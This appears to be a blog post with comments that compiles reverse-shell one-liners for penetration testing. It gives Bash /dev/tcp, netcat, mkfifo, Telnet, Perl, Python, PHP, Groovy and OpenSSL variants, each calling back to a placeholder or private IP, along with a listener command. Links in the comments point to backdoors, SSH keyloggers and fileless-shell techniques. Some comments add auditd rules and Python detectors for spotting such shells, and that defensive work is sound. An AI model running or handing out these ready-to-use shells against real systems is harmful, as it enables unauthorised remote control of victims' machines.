=Start=
Background:
At work I sometimes need reverse shells written in various languages for testing, so I am recording them here as a reference for when they are needed.
Main text:
Reference answer:
Step 1: first start a listener locally
root@kali:~# nc -nvlp 12345
Note: the port 12345 used above must match the port in the command executed on the remote host below.
Step 2: then run the reverse shell command on the remote host
# Bash
bash -i >& /dev/tcp/x.x.x.x/12345 0>&1
# nc with '-e' support
nc -e /bin/sh x.x.x.x 12345
# nc without '-e' support
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 12345 >/tmp/f
# Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 12345 0</tmp/p | /bin/bash 1>/tmp/p
# Perl
perl -e 'use Socket;$i="x.x.x.x";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("x.x.x.x",12345);exec("/bin/sh -i <&3 >&3 2>&3");'
# Java (Groovy syntax)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/12345;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
References:
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://highon.coffee/blog/reverse-shell-cheat-sheet/
- https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
- http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
- http://www.91ri.org/9367.html
- https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
- https://www.waitalone.cn/linux-shell-rebound-under-way.html
=END=
18 comments on "Notes and summary of reverse shells in various languages"
[ Pentest ] How to get a fileless reverse shell during a penetration test
https://0x00sec.org/t/running-binaries-without-leaving-tracks/2166
https://0x00sec.org/t/spawning-reverse-shells/2133/8
https://0x00sec.org/t/linux-infecting-running-processes/1097
https://0x00sec.org/t/remote-exploit-shellcode-without-sockets/1440
`
Option 1. Memory File Systems
Option 2. Evil Kernel Module
Option 3. Abusing gdb
Option 4. More gdb abusing
`
PHP root (suid) reverse shell
https://github.com/mempodippy/snodew
`
snodew is a PHP reverse shell backdoor which uses a small suid binary to escalate privileges on connection
snodew is made mainly to work alongside vlany but can also be setup as a regular root backdoor
`
Reverse shell monitoring
http://pirogue.org/2017/07/25/reverse-shell/
`
I. Trace system calls
1. strace bash test.sh
2. strace -c bash test.sh
II. audit monitoring and analysis
auditctl -A exit,always -S connect
auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
auditctl -a exit,always -F arch=b64 -S connect
`
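The auditd rules in the comment above record every connect() call but leave the correlation to the analyst. As an added example (not part of the original post or of the pirogue.org write-up), the following Python script joins the SYSCALL and SOCKADDR records that share one audit serial, decodes the hex-encoded saddr field into an IP and port, and reports the connects issued by a shell process. The audit lines are constructed for the example, the CONNECTION key matches the rule above, and the list of shell process names is an assumption.

```python
"""Correlate auditd connect() records (rule: -S connect -k CONNECTION) and flag
outbound connections made by shell processes. Added example; the sample log is constructed."""
import re
import socket
import struct
from collections import defaultdict

# Process names that rarely have a legitimate reason to call connect() themselves (assumption).
SHELL_COMMS = {"bash", "sh", "dash", "zsh"}
# Address-family values as Linux writes them into the record (the log is always from Linux).
LINUX_AF_INET, LINUX_AF_INET6 = 2, 10

# Constructed sample in auditd's native record format: a bash connect() to 192.168.1.10:12345
# and a curl connect() to 93.184.216.34:443, each followed by its SOCKADDR record.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=7ffd1234 a2=10 a3=0 items=0 ppid=2100 pid=2133 auid=4294967295 uid=33 gid=33 euid=33 comm="bash" exe="/usr/bin/bash" key="CONNECTION"
type=SOCKADDR msg=audit(1700000000.101:501): saddr=02003039C0A8010A0000000000000000
type=SYSCALL msg=audit(1700000000.205:502): arch=c000003e syscall=42 success=yes exit=0 a0=5 a1=7ffd5678 a2=10 a3=0 items=0 ppid=1 pid=900 auid=4294967295 uid=0 gid=0 euid=0 comm="curl" exe="/usr/bin/curl" key="CONNECTION"
type=SOCKADDR msg=audit(1700000000.205:502): saddr=020001BB5DB8D8220000000000000000
"""

_HEADER_RE = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):")
_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Split one audit line into (record type, serial, {field: value}); None if not an audit line."""
    m = _HEADER_RE.match(line)
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in _FIELD_RE.findall(line[m.end():])}
    return m.group("type"), int(m.group("serial")), fields


def decode_saddr(hex_saddr):
    """Decode the hex struct sockaddr of a SOCKADDR record into (ip, port), or None."""
    data = bytes.fromhex(hex_saddr)
    if len(data) < 2:
        return None
    family = struct.unpack("<H", data[:2])[0]      # sa_family is host order (x86: little-endian)
    if family == LINUX_AF_INET and len(data) >= 8:
        port = struct.unpack("!H", data[2:4])[0]   # sin_port is network order
        return socket.inet_ntoa(data[4:8]), port
    if family == LINUX_AF_INET6 and len(data) >= 24:
        port = struct.unpack("!H", data[2:4])[0]
        return socket.inet_ntop(socket.AF_INET6, data[8:24]), port
    return None                                     # AF_UNIX, netlink, etc. are not of interest here


def find_shell_connections(log_text):
    """Return one dict per successful connect() issued by a shell, with the decoded destination."""
    by_serial = defaultdict(dict)
    for line in log_text.splitlines():
        parsed = parse_record(line)
        if parsed is None:
            continue
        rtype, serial, fields = parsed
        by_serial[serial][rtype] = fields           # the records of one event share a serial
    hits = []
    for serial, recs in sorted(by_serial.items()):
        sc, sa = recs.get("SYSCALL"), recs.get("SOCKADDR")
        if not sc or not sa or sc.get("success") != "yes":
            continue
        if sc.get("comm") not in SHELL_COMMS:
            continue
        dst = decode_saddr(sa.get("saddr", ""))
        if dst is None:
            continue
        hits.append({"serial": serial, "pid": int(sc["pid"]), "uid": int(sc["uid"]),
                     "comm": sc["comm"], "exe": sc.get("exe"), "dst": dst})
    return hits


if __name__ == "__main__":
    for hit in find_shell_connections(SAMPLE_AUDIT_LOG):
        print(f"pid={hit['pid']} uid={hit['uid']} {hit['comm']} ({hit['exe']}) "
              f"-> {hit['dst'][0]}:{hit['dst'][1]}")
```

On a live host the same records come out of `ausearch -k CONNECTION` (real records carry more fields, such as ses= and tty=, which the parser simply keeps). The comm check is the weak point the next comment also notes: a shell binary copied under another name is not matched, so the decoded destination and uid are the more robust signals to ship to a SIEM.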
[Tech share] Summary of Linux one-line reverse shells
http://bobao.360.cn/learning/detail/4551.html
https://github.com/smartFlash/pySecurity/blob/master/zh-cn/0x11.md
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.freebuf.com/news/142195.html
http://brieflyx.me/2015/linux-tools/socat-introduction/
[Tech share] An alternative WebShell detection mechanism based on auditd
https://mp.weixin.qq.com/s/arF1PKKfZ143XxcqnwKSiA
[Tool intro] Reverse shell management tool
http://www.jianshu.com/p/8dc5a4abcc09
rsg – a tool that generates reverse shells in multiple ways
https://github.com/mthbernardes/rsg
Common reverse shell methods used during network penetration testing
https://bitrot.sh/cheatsheet/14-12-2017-pivoting/
Reverse Shell as a Service
https://github.com/lukechilds/reverse-shell
Analysis of Bash special redirection
https://mp.weixin.qq.com/s/D_k_Gv3dcG91Rlw-fyMoQA
https://www.secpulse.com/archives/71494.html
gorsh – a reverse shell written in Go
https://github.com/audibleblink/gorsh
Automated reverse shell defense techniques
https://mp.weixin.qq.com/s/5N0uYhjo8Tub1CfBLg1zjg
`
0x1 Reverse shell analysis
0x2 Overall approach
0x3 Failed attempts
Round 1 Syslog history of BASH
Round 2 The proc filesystem
Round 3 bash open events
0x4 Success
Round 4 Netlink Socket
Advantages:
Fast response: because the Netlink communication mechanism uses very few system resources, the response to shell process start events is essentially instant; once the subsequent active check confirms a reverse shell, it is killed directly.
Hard to bypass: since the usual reverse shell techniques invoke bash and obtain its standard input/output through redirection, they will basically all be blocked unless the attacker has prior knowledge of the defense.
Comprehensive information: once a reverse shell is found, the information collected about the shell includes the PID, the SID (which can be used to determine which process group has the vulnerability), the current path (convenient for locating the webshell), the system user, and so on. One can further explore application scenarios for this technique, or aggregate the data into an analysis platform such as a SOC for coordinated response.
Disadvantages:
Bypass risk: whether a process is a shell can only be judged from the executable filename, so uploading an executable or copying the bash binary to another path bypasses this method. Strictly restricting execute permission on upload directories and the permissions of the bash binary can effectively limit this risk.
Detection blind spot: events where commands are executed directly through the webshell cannot be detected, so low-privilege, non-interactive commands can still be run via the webshell.
`
https://github.com/dbrandt/proc_events
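The comment above describes confirming a newly started shell by checking whether its standard input/output were redirected to a socket, which is exactly what the one-liners in the post do. As an added example (not the code of the article or of proc_events), the Python below performs that active check: it takes the readlink targets of /proc/<pid>/fd/0-2, matches socket:[inode] entries against /proc/net/tcp to recover the remote endpoint, and keeps the executable-name limitation the comment describes. The /proc/net/tcp excerpt and the fd targets are constructed samples; inspect_pid() runs the same check against the live /proc (root is needed for other users' processes).

```python
"""Active confirmation of a suspected reverse shell via /proc: is a shell process's
stdin/stdout a socket, and where does that socket go? Added example; samples are constructed."""
import os
import re
import socket
import struct

# Executable names treated as shells (assumption; a renamed or copied shell binary is not
# matched, which is the blind spot the comment above points out).
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ash"}
_SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
TCP_ESTABLISHED = "01"

# Constructed /proc/net/tcp excerpt: inode 48213 is 192.168.1.11:45780 -> 10.0.0.1:12345
# (ESTABLISHED); inode 12001 is a listener on port 80.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0B01A8C0:B2D4 0100000A:3039 01 00000000:00000000 00:00000000 00000000    33        0 48213 1 0000000000000000 20 4 30 10 -1
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12001 1 0000000000000000 100 0 0 10 0
"""
# Constructed readlink targets of /proc/<pid>/fd/{0,1,2}: a shell whose std fds are one socket
# (the redirect pattern of the one-liners in the post) versus a normal interactive shell on a pty.
SUSPECT_FDS = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}
NORMAL_FDS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}


def parse_proc_net_tcp(text):
    """Map socket inode -> (remote_ip, remote_port, state) from /proc/net/tcp contents.
    Addresses are hex in host byte order (little-endian on x86); ports are hex in network order."""
    table = {}
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 10:
            continue
        rem_ip_hex, rem_port_hex = parts[2].split(":")
        rem_ip = socket.inet_ntoa(struct.pack("<I", int(rem_ip_hex, 16)))
        table[int(parts[9])] = (rem_ip, int(rem_port_hex, 16), parts[3])
    return table


def classify(exe_path, std_fds, tcp_table):
    """Return None, or a dict describing the suspected reverse shell."""
    if os.path.basename(exe_path) not in SHELL_NAMES:
        return None
    socket_fds = {}
    for fd in (0, 1, 2):
        m = _SOCKET_RE.match(std_fds.get(fd, ""))
        if m:
            socket_fds[fd] = int(m.group(1))
    # The pattern of interest: a shell that reads commands from, or writes output to, a socket.
    if 0 not in socket_fds and 1 not in socket_fds:
        return None
    remote = []
    for inode in sorted(set(socket_fds.values())):
        entry = tcp_table.get(inode)
        if entry and entry[2] == TCP_ESTABLISHED:
            remote.append(entry[:2])
    return {"exe": exe_path, "socket_fds": socket_fds, "remote": remote}


def inspect_pid(pid, tcp_path="/proc/net/tcp"):
    """Live check of one process (Linux only; root needed for other users' processes)."""
    try:
        exe = os.readlink(f"/proc/{pid}/exe")
        fds = {}
        for fd in (0, 1, 2):
            try:
                fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
            except OSError:
                pass                                # fd closed: leave it out
        with open(tcp_path) as fh:
            tcp_table = parse_proc_net_tcp(fh.read())
    except OSError:
        return None                                 # process gone or not readable
    return classify(exe, fds, tcp_table)


if __name__ == "__main__":
    table = parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)
    print(classify("/usr/bin/bash", SUSPECT_FDS, table))
    print(classify("/usr/bin/bash", NORMAL_FDS, table))
```

This check catches the /dev/tcp, python dup2, perl and php variants in the post, where the shell's std fds are the socket itself. The mkfifo-plus-nc variant gives the shell a FIFO on stdin and a pipe on stdout, so there the pipe peer (the nc process) is the one holding the socket and would have to be inspected instead; IPv6 connections (/proc/net/tcp6) are not parsed here.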
shellver – one-line reverse shell generator
https://github.com/0xR0/shellver
xsshell – XSS reverse shell framework
https://github.com/raz-varren/xsshell
A reverse shell written in Go that communicates over DNS (Chashell: Go reverse shell that communicates over DNS)
https://github.com/sysdream/chashell
Writing a password-protected reverse shell (Linux/x64)
https://medium.com/@0x0FFB347/writing-a-password-protected-reverse-shell-linux-x64-5f4d3a28d91a
List of some reverse shell commands included in metasploit
https://github.com/rapid7/metasploit-framework/tree/master/modules/payloads/singles/cmd/unix
Rapid7 Vulnerability & Exploit Database
https://www.rapid7.com/db/
Complete guide to Reverse Shells
https://www.metahackers.pro/reverse-shells-101/
Spawing real TTY shells
https://www.metahackers.pro/spawing-tty-shells/
Analysis and investigation of Linux SSH backdoors
https://www.cnblogs.com/17bdw/p/9170381.html
`
1. SSH backdoor categories
There are the following kinds of SSH backdoors:
Symbolic link
SSH Server wrapper
SSH Keylogger
2. Symbolic link
3. SSH Server wrapper
4. SSH Keylogger
5. References
`
https://joychou.org/hostsec/linux-ssh-backdoor.html
http://pastebin.com/2NgL8SDE
http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/
https://diogomonica.com/2011/02/03/poor-mans-ssh-keylogger/
https://_thorns.gitbooks.io/sec/content/sshbackdoor_md.html
http://drops.wooyun.org/tips/1951
Day 43: Reverse Shell with OpenSSL
https://int0x33.medium.com/day-43-reverse-shell-with-openssl-1ee2574aa998
OPENSSL FOR REVERSE SHELL
https://rioasmara.com/2020/06/22/openssl-for-reverse-shell/
Reverse shell
https://gtfobins.github.io/gtfobins/openssl/
Reverse shell
https://mal-hiboux.gitlab.io/howl-to/docs/05-persistence/03-reverse-shell/
`
# Run the listener on the attacker machine
user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
// or
user@attack$ ncat --ssl -vv -l -p 4242
# Run the reverse shell call-back command on the victim machine
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
`
Encrypted reverse shell
https://www.reddit.com/r/hackthebox/comments/i4qgu4/encrypted_reverse_shell/
[…] Notes and summary of reverse shells in various languages https://ixyzero.com/blog/archives/3275.html […]